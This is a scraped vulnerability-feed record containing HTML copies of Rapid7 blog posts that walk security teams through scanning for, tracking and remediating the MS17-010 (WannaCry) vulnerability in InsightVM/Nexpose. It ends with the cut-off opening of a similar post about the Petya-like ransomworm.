dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\"><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66953/pastedImage_20.png\"><img class=\"image-9 jive-image\" height=\"122\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66953/758-122/pastedImage_20.png\" style=\" width: 1060.2px;\" width=\"758\"/></a></span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><h2 dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">7. 
Save the template and run a scan to identify all assets with MS17-010.</span></h2><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><h2><span style=\"font-size: 18pt;\">Creating a Dynamic Asset Group for MS17-010</span></h2><p><span style=\"font-size: 12pt;\">Now that you have your assets scanned, you may want to create a Dynamic Asset Group to report/tag off of that will update itself whenever new assets are found with this vulnerability (and when they are fixed). To get started, click on the filter icon in the top right of the <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fproducts%2Finsightvm%2F\" target=\"_blank\">InsightVM</a> console, just under the search button:<br/></span></p><p><span style=\"font-size: 12pt;\"><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66963/pastedImage_34.png\"><img class=\"image-13 jive-image\" height=\"118\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66963/468-118/pastedImage_34.png\" style=\" width: 468.099px;\" width=\"468\"/></a></span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 12pt; font-family: Arial; color: #000000;\">Now, use the \"vulnerability title\" filter to search for MS17-010 and click \"Create Asset Group\":</span></p><p dir=\"ltr\"><span style=\"color: #000000; text-decoration: underline; font-size: 18pt; font-family: Arial;\"><strong><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66964/pastedImage_35.png\"><img class=\"jive-image image-14\" height=\"183\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66964/758-183/pastedImage_35.png\" style=\" width:758px;\" width=\"758\"/></a></strong></span></p><p dir=\"ltr\">This asset group can now be used for reporting as well as tagging to quickly identify exposed systems.</p><p dir=\"ltr\" 
style=\"min-height: 8pt; padding: 0px;\">&#160;</p><h2 dir=\"ltr\">Creating a WannaCry Dashboard</h2><p dir=\"ltr\"><span style=\"font-size: 11.5pt; font-family: Arial; color: #303030;\">Recently, Ken Mizota posted an article on how to build a custom dashboard to </span><a class=\"jive-link-blog-small\" data-containerId=\"1004\" data-containerType=\"37\" data-objectId=\"7855\" data-objectType=\"38\" href=\"https://community.rapid7.com/community/nexpose/blog/2017/05/09/practical-vm-tips-for-the-shadow-brokers-leaked-exploits\"><span style=\"font-size: 11.5pt; font-family: Arial; color: #3f98d4;\">track your exposure to exploits from the Shadow Brokers leak</span></a><span style=\"font-size: 11.5pt; font-family: Arial; color: #303030;\">. If you already did that, you're good to go! If you wanted to be specific to WannaCry, you could use this Dashboard filter:</span></p><p><span style=\"background-color: #f6f6f6; color: #000000; font-size: 12pt; font-family: Calibri;\">asset.vulnerability.title CONTAINS \"cve-2017-0143\" OR asset.vulnerability.title CONTAINS \"cve-2017-0144\" OR asset.vulnerability.title CONTAINS \"cve-2017-0145\" OR asset.vulnerability.title CONTAINS \"cve-2017-0146\" OR asset.vulnerability.title CONTAINS \"cve-2017-0147\" OR asset.vulnerability.title CONTAINS \"cve-2017-0148\"</span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><h2>Creating a Remediation Project for MS17-010:</h2><p>In InsightVM, you can also create a remediation project for MS17-010 to track the progress of remediation live. 
To do this, go to the &ldquo;Projects&#8221; tab and click &ldquo;Create a Project&#8221;:</p><p dir=\"ltr\"><span><span><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66955/pastedImage_28.png\"><img class=\"image-11 jive-image\" height=\"174\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66955/758-174/pastedImage_28.png\" style=\" width: 988.531px;\" width=\"758\"/></a></span></span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Give the project a name, and under vulnerability filter type in &ldquo;vulnerability.vulnKey = &ldquo;MS17-010&#8221;:</span></p><p><span><span><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66962/pastedImage_29.png\"><img class=\"image-12 jive-image\" height=\"539\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66962/758-539/pastedImage_29.png\" style=\" width: 833.213px;\" width=\"758\"/></a></span></span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Note that this project is going to be dynamic, so it will automatically update as you fix and/or find new instances of this vulnerability. </span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Now, you can give this project a description, and configure who is responsible for remediation, as well as access levels if you wish. 
If you have JIRA, you can also configure the automatic ticketing integration between InsightVM and JIRA to automatically assign tickets to the right folks.</span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Using these steps, you&#8217;ll be able to quickly scan for the WannaCry vulnerability as well as ensure that the vulns are being remediated. If you have any questions please don&#8217;t hesitate to let us know!</span></p></div><!-- [DocumentBodyEnd:425e125a-783e-4160-8d35-eab296a1b1bb] -->", "cvelist": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "href": "https://community.rapid7.com/community/nexpose/blog/2017/05/15/scanning-and-remediating-wannacry-in-insightvm-and-nexpose", "modified": "2017-05-15T17:30:34", "lastseen": "2017-05-15T17:48:40"}, "differentElements": ["description", "published", "modified"], "edition": 1}], "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "<!-- [DocumentBodyStart:2ca40ae4-bf1e-4d07-bca8-48bcdefcec45] --><div class=\"jive-rendered-content\"><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Today, security teams are starting their work week with a scramble to remediate MS17-010, in order to prevent the associated <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fsecurity-response%2Fwanna-decryptor\" target=\"_blank\">ransomware attack, WannaCry</a>, also known as Wanna Decryptor, WNCRY, and Wanna Decryptor 2.0 (how I miss the halcyon days when vulnerabilities had gentle names like Poodle). 
</span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">With all of the WannaCry information circulating we want to keep this simple. First, check out this link to an <a class=\"jive-link-blog-small\" data-containerId=\"5165\" data-containerType=\"37\" data-objectId=\"7869\" data-objectType=\"38\" href=\"https://community.rapid7.com/community/infosec/blog/2017/05/12/wanna-decryptor-wncry-ransomware-explained\">overview of the WannaCry ransomware vulnerability</a> written by <a class=\"jive-link-profile-small jiveTT-hover-user\" data-containerId=\"-1\" data-containerType=\"-1\" data-objectId=\"29826\" data-objectType=\"3\" href=\"https://community.rapid7.com/people/hrbrmstr\">Bob Rudis</a></span><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">, and then review the below steps to quickly scan for this vulnerability in your own infrastructure (if you aren&#8217;t already a customer, go </span><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fproducts%2Finsightvm%2Fdownload%2F\" target=\"_blank\"><span style=\"font-size: 11pt; font-family: Arial; color: #1155cc;\">try out InsightVM for free</span></a><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\"> you can use this free trial to scan for this vulnerability across your environment), create a dynamic asset group to continuously see affected assets, as well as create a dynamic remediation project to track the progress of remediating WannaCry.</span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Here is the InsightVM/Nexpose step-by-step guide to create a scan template specifically to look for MS17-010:</span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; 
font-family: Arial; color: #000000;\">1. Under the Administration tab, go to Templates &gt; Manage Templates</span></p><p><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66939/pastedImage_11.png\"><img class=\"image-1 jive-image\" height=\"276\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66939/754-276/pastedImage_11.png\" style=\" width: 754.425px;\" width=\"754\"/></a></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">2. Copy the following template: Full Audit enhanced logging without Web Spider. Don&#8217;t forget to give your copy a name and description; here, we&#8217;ll call it &ldquo;WNCRY Scan Template&#8221;</span></p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\"><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66940/pastedImage_12.png\"><img class=\"image-2 jive-image\" height=\"299\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66940/758-299/pastedImage_12.png\" style=\"width:758px; height: 301.367px;\" width=\"758\"/></a></span></p><p dir=\"ltr\"><span><span><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66944/pastedImage_13.png\"><img class=\"image-3 jive-image\" height=\"275\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66944/758-275/pastedImage_13.png\" style=\" width: 798.319px;\" width=\"758\"/></a></span></span><span><span><br/></span></span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">3. 
Click on Vulnerability Checks and then &ldquo;By Individual Check&#8221;</span></p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\"><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66945/pastedImage_14.png\"><img class=\"jive-image image-4\" height=\"322\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66945/758-322/pastedImage_14.png\" style=\" width: 867.529px;\" width=\"758\"/></a></span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">4. Add Check &ldquo;<a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fmodules%2Fauxiliary%2Fscanner%2Fsmb%2Fsmb_ms17_010\" target=\"_blank\">MS17-010</a>&#8221; and click save:</span></p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\"><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66946/pastedImage_15.png\"><img class=\"image-5 jive-image\" height=\"275\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66946/758-275/pastedImage_15.png\" style=\" width:758px;\" width=\"758\"/></a></span></p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">This should come back with 192 checks that are related to MS17-010. 
The related CVEs are:</span></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><span style=\"font-size: 10.5pt; font-family: Arial; color: #333333;\"><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0143\" target=\"_blank\">CVE-2017-0143</a></span></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><span style=\"font-size: 10.5pt; font-family: Arial; color: #333333;\"><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0144\" target=\"_blank\">CVE-2017-0144</a></span></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><span style=\"font-size: 10.5pt; font-family: Arial; color: #333333;\"><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0145\" target=\"_blank\">CVE-2017-0145</a></span></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><span style=\"font-size: 10.5pt; font-family: Arial; color: #333333;\"><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0146\" target=\"_blank\">CVE-2017-0146</a></span></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><span style=\"font-size: 10.5pt; font-family: Arial; color: #333333;\"><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0147\" target=\"_blank\">CVE-2017-0147</a></span></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><span style=\"font-size: 10.5pt; font-family: Arial; color: #333333;\"><a class=\"jive-link-external-small\" 
href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0148\" target=\"_blank\">CVE-2017-0148</a></span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">5. Now, under \"By Category\" click &ldquo;Remove Categories&#8221;, select all, and click save:</span></p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\"><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66950/pastedImage_16.png\"><img class=\"image-6 jive-image\" height=\"202\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66950/758-202/pastedImage_16.png\" style=\" width: 973.212px;\" width=\"758\"/></a></span></p><p dir=\"ltr\"><span><span><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66952/pastedImage_18.png\"><img class=\"jive-image image-8\" height=\"161\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66952/758-161/pastedImage_18.png\" style=\" width: 1008.09px;\" width=\"758\"/></a></span></span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">6. 
And finally, under Check Type, click &ldquo;Remove Check Types&#8221;, select all, and click save</span></p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\"><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66953/pastedImage_20.png\"><img class=\"image-9 jive-image\" height=\"122\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66953/758-122/pastedImage_20.png\" style=\" width: 1060.2px;\" width=\"758\"/></a></span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><h2 dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">7. Save the template and run a scan to identify all assets with MS17-010.</span></h2><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><h2><span style=\"font-size: 18pt;\">Creating a Dynamic Asset Group for MS17-010</span></h2><p><span style=\"font-size: 12pt;\">Now that you have your assets scanned, you may want to create a Dynamic Asset Group to report/tag off of that will update itself whenever new assets are found with this vulnerability (and when they are fixed). 
To get started, click on the filter icon in the top right of the <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fproducts%2Finsightvm%2F\" target=\"_blank\">InsightVM</a> console, just under the search button:<br/></span></p><p><span style=\"font-size: 12pt;\"><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66963/pastedImage_34.png\"><img class=\"image-13 jive-image\" height=\"118\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66963/468-118/pastedImage_34.png\" style=\" width: 468.099px;\" width=\"468\"/></a></span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 12pt; font-family: Arial; color: #000000;\">Now, use the \"CVE ID\" filter to specify the CVEs listed below:</span></p><p dir=\"ltr\"><span style=\"font-size: 12pt; font-family: Arial; color: #000000;\"><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66971/pastedImage_1.png\"><img class=\"jive-image image-14\" height=\"513\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66971/758-513/pastedImage_1.png\" style=\" width: 804.524px;\" width=\"758\"/></a></span></p><p dir=\"ltr\">This asset group can now be used for reporting as well as tagging to quickly identify exposed systems.</p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><h2 dir=\"ltr\">Creating a WannaCry Dashboard</h2><p dir=\"ltr\"><span style=\"font-size: 11.5pt; font-family: Arial; color: #303030;\">Recently, Ken Mizota posted an article on how to build a custom dashboard to </span><a class=\"jive-link-blog-small\" data-containerId=\"1004\" data-containerType=\"37\" data-objectId=\"7855\" data-objectType=\"38\" href=\"https://community.rapid7.com/community/nexpose/blog/2017/05/09/practical-vm-tips-for-the-shadow-brokers-leaked-exploits\"><span style=\"font-size: 11.5pt; 
font-family: Arial; color: #3f98d4;\">track your exposure to exploits from the Shadow Brokers leak</span></a><span style=\"font-size: 11.5pt; font-family: Arial; color: #303030;\">. If you already did that, you're good to go! If you wanted to be specific to WannaCry, you could use this Dashboard filter:</span></p><p><span style=\"background-color: #f6f6f6; color: #000000; font-size: 12pt; font-family: Calibri;\">asset.vulnerability.title CONTAINS \"cve-2017-0143\" OR asset.vulnerability.title CONTAINS \"cve-2017-0144\" OR asset.vulnerability.title CONTAINS \"cve-2017-0145\" OR asset.vulnerability.title CONTAINS \"cve-2017-0146\" OR asset.vulnerability.title CONTAINS \"cve-2017-0147\" OR asset.vulnerability.title CONTAINS \"cve-2017-0148\"</span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><h2>Creating a Remediation Project for MS17-010:</h2><p>In InsightVM, you can also create a remediation project for MS17-010 to track the progress of remediation live. To do this, go to the &ldquo;Projects&#8221; tab and click &ldquo;Create a Project&#8221;:</p><p dir=\"ltr\"><span><span><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66955/pastedImage_28.png\"><img class=\"image-11 jive-image\" height=\"174\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66955/758-174/pastedImage_28.png\" style=\" width: 988.531px;\" width=\"758\"/></a></span></span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Give the project a name, and under vulnerability filter type in &ldquo;vulnerability.vulnKey = &ldquo;MS17-010&#8221;:</span></p><p><span><span><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66962/pastedImage_29.png\"><img class=\"image-12 jive-image\" height=\"539\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66962/758-539/pastedImage_29.png\" 
style=\" width: 833.213px;\" width=\"758\"/></a></span></span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Note that this project is going to be dynamic, so it will automatically update as you fix and/or find new instances of this vulnerability. </span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Now, you can give this project a description, and configure who is responsible for remediation, as well as access levels if you wish. If you have JIRA, you can also configure the automatic ticketing integration between InsightVM and JIRA to automatically assign tickets to the right folks.</span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Using these steps, you&#8217;ll be able to quickly scan for the WannaCry vulnerability as well as ensure that the vulns are being remediated. If you have any questions please don&#8217;t hesitate to let us know!</span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">For more information and resources on WannaCry and ransomware, please visit this <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fsecurity-response%2Fwanna-decryptor%2F\" target=\"_blank\">page</a>. 
</span></p></div><!-- [DocumentBodyEnd:2ca40ae4-bf1e-4d07-bca8-48bcdefcec45] -->", "cvelist": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "href": "https://community.rapid7.com/community/nexpose/blog/2017/05/15/scanning-and-remediating-wannacry-in-insightvm-and-nexpose", "modified": "2017-05-15T18:25:42", "lastseen": "2017-05-15T18:48:41", "immutableFields": [], "cvss2": {}, "cvss3": {}}, {"cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://community.rapid7.com/community/nexpose/blog/2017/06/28/petya-like-ransomworm-leveraging-insightvm-and-nexpose-for-visibility-into-ms17-010", "references": [], "enchantments_done": [], "_object_types": ["robots.models.rss.RssBulletin", "robots.models.base.Bulletin"], "id": "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "history": [{"lastseen": "2017-06-28T04:20:16", "differentElements": ["description", "modified", "published"], "edition": 1, "bulletin": {"cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://community.rapid7.com/community/nexpose/blog/2017/06/28/petya-like-ransomworm-leveraging-insightvm-and-nexpose-for-visibility-into-ms17-010", "id": "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "history": [], "modified": "2017-06-28T00:44:35", "type": "rapid7community", "description": "<!-- [DocumentBodyStart:e11d68b4-bb44-4417-8360-8e6ed76a3e01] --><div class=\"jive-rendered-content\"><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">A Petya-like ransomworm struck on June 27th 2017 and spread throughout the day, affecting organizations in several european countries and the US. 
It is believed that the ransomworm may achieve its initial infection via a malicious document attached to a phishing email, and then leverages the </span><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fmodules%2Fexploit%2Fwindows%2Fsmb%2Fms17_010_eternalblue\" target=\"_blank\"><span style=\"font-size: 11pt; font-family: Arial; color: #1155cc;\">EternalBlue </span></a><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">and </span><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fsecurity-response%2Fdoublepulsar%2F\" target=\"_blank\"><span style=\"font-size: 11pt; font-family: Arial; color: #1155cc;\">DoublePulsar </span></a><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">exploits to spread laterally. Once in place, it takes control of a system and encrypts files. As a reminder, EternalBlue was leveraged for </span><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fsecurity-response%2Fwanna-decryptor%2F\" target=\"_blank\"><span style=\"font-size: 11pt; font-family: Arial; color: #1155cc;\">WannaCry</span></a><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\"> as well, so we cannot stress enough the importance of patching against MS17-010 vulnerabilities</span><span style=\"font-size: 11pt; font-family: Arial; color: #ff0000;\">.</span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">For the latest updates on this ransomworm, please see Rapid7&#8217;s </span><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fsecurity-response%2Fpetya%2F\" target=\"_blank\"><span style=\"font-size: 11pt; 
font-family: Arial; color: #1155cc;\">recommended actions</span></a><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">.</span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">To help customers understand their risk, we are sharing steps to create a targeted scan, dynamic asset group, and remediation project for identifying and fixing vulnerabilities; we will update as more information becomes available on other CVEs that may be used to spread the worm. As always, you can contact Rapid7 Support and your CSM with any questions, and if you haven&#8217;t done so already, </span><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fproducts%2Finsightvm%2Fdownload%2F\" target=\"_blank\"><span style=\"font-size: 11pt; font-family: Arial; color: #1155cc;\">download a trial of InsightVM here</span></a><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">.</span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><h2 dir=\"ltr\"><span style=\"color: #eb7a3d;\">Creating a Scan Template</span></h2><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">The step-by-step guide to create an InsightVM/Nexpose scan template specifically to look for MS17-010 </span><span style=\"font-size: 11pt; font-family: Arial; color: #212121;\">is as follows:</span></p><p style=\"padding-left: 30px;\"><span style=\"font-size: 11pt; font-family: Arial; color: #212121;\">1.&#160; Under the Administration tab, go to Templates &gt; Manage Templates</span></p><p style=\"min-height: 8pt; padding: 0px; padding-left: 30px;\">&#160;</p><p style=\"padding-left: 30px;\"><span style=\"color: #000000; font-family: Arial; font-size: 11pt;\"><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7925-67241/Admin-ManageTemplates.gif\"><img 
alt=\"Admin-ManageTemplates.gif\" class=\"image-1 jive-image\" height=\"687\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7925-67241/Admin-ManageTemplates.gif\" style=\"width: 620px; height: 298px;\" width=\"1430\"/></a></span></p><p style=\"min-height: 8pt; padding: 0px; padding-left: 30px;\">&#160;</p><p style=\"min-height: 8pt; padding: 0px; padding-left: 30px;\">&#160;</p><p style=\"padding-left: 30px;\"><span style=\"color: #000000; font-family: Arial; font-size: 11pt;\">2. Copy the following template: Full Audit without Web Spider. Don't forget to give your copy a name and description.</span></p><p style=\"min-height: 8pt; padding: 0px; padding-left: 30px;\">&#160;</p><p style=\"padding-left: 30px;\"><span style=\"color: #000000; font-family: Arial; font-size: 11pt;\"><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7925-67242/Admin-CopyScantemplate.gif\"><img alt=\"Admin-CopyScantemplate.gif\" class=\"image-2 jive-image\" height=\"747\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7925-67242/Admin-CopyScantemplate.gif\" style=\"width: 620px; height: 325px;\" width=\"1425\"/></a></span></p><p style=\"min-height: 8pt; padding: 0px; padding-left: 30px;\">&#160;</p><p style=\"padding-left: 30px;\"><span style=\"color: #000000; font-family: Arial; font-size: 11pt;\">3. First uncheck \"Policies\". 
Click on Vulnerability Checks and then \"By Individual Checks\"</span></p><p style=\"min-height: 8pt; padding: 0px; padding-left: 30px;\">&#160;</p><p style=\"padding-left: 30px;\"><span style=\"color: #000000; font-family: Arial; font-size: 11pt;\"><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7925-67243/Admin-ByIndividualCheck.gif\"><img alt=\"Admin-ByIndividualCheck.gif\" class=\"image-3 jive-image\" height=\"747\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7925-67243/Admin-ByIndividualCheck.gif\" style=\"width: 620px; height: 325px;\" width=\"1425\"/></a></span></p><p style=\"min-height: 8pt; padding: 0px; padding-left: 30px;\">&#160;</p><p style=\"padding-left: 30px;\"><span style=\"color: #000000; font-family: Arial; font-size: 11pt;\">4. <span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Add Check &ldquo;</span><a class=\"jive-link-external-small\" href=\"/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fmodules%2Fauxiliary%2Fscanner%2Fsmb%2Fsmb_ms17_010\" rel=\"nofollow\" target=\"_blank\"><span style=\"font-size: 11pt; font-family: Arial; color: #3f98d4;\">MS17-010</span></a><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">&#8221; and click Save:</span></span></p><p style=\"min-height: 8pt; padding: 0px; padding-left: 30px;\">&#160;</p><p style=\"padding-left: 30px;\"><span style=\"color: #000000; font-size: 11pt; font-family: Arial;\"><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7925-67244/Scantemplate-ms17-010.gif\"><img 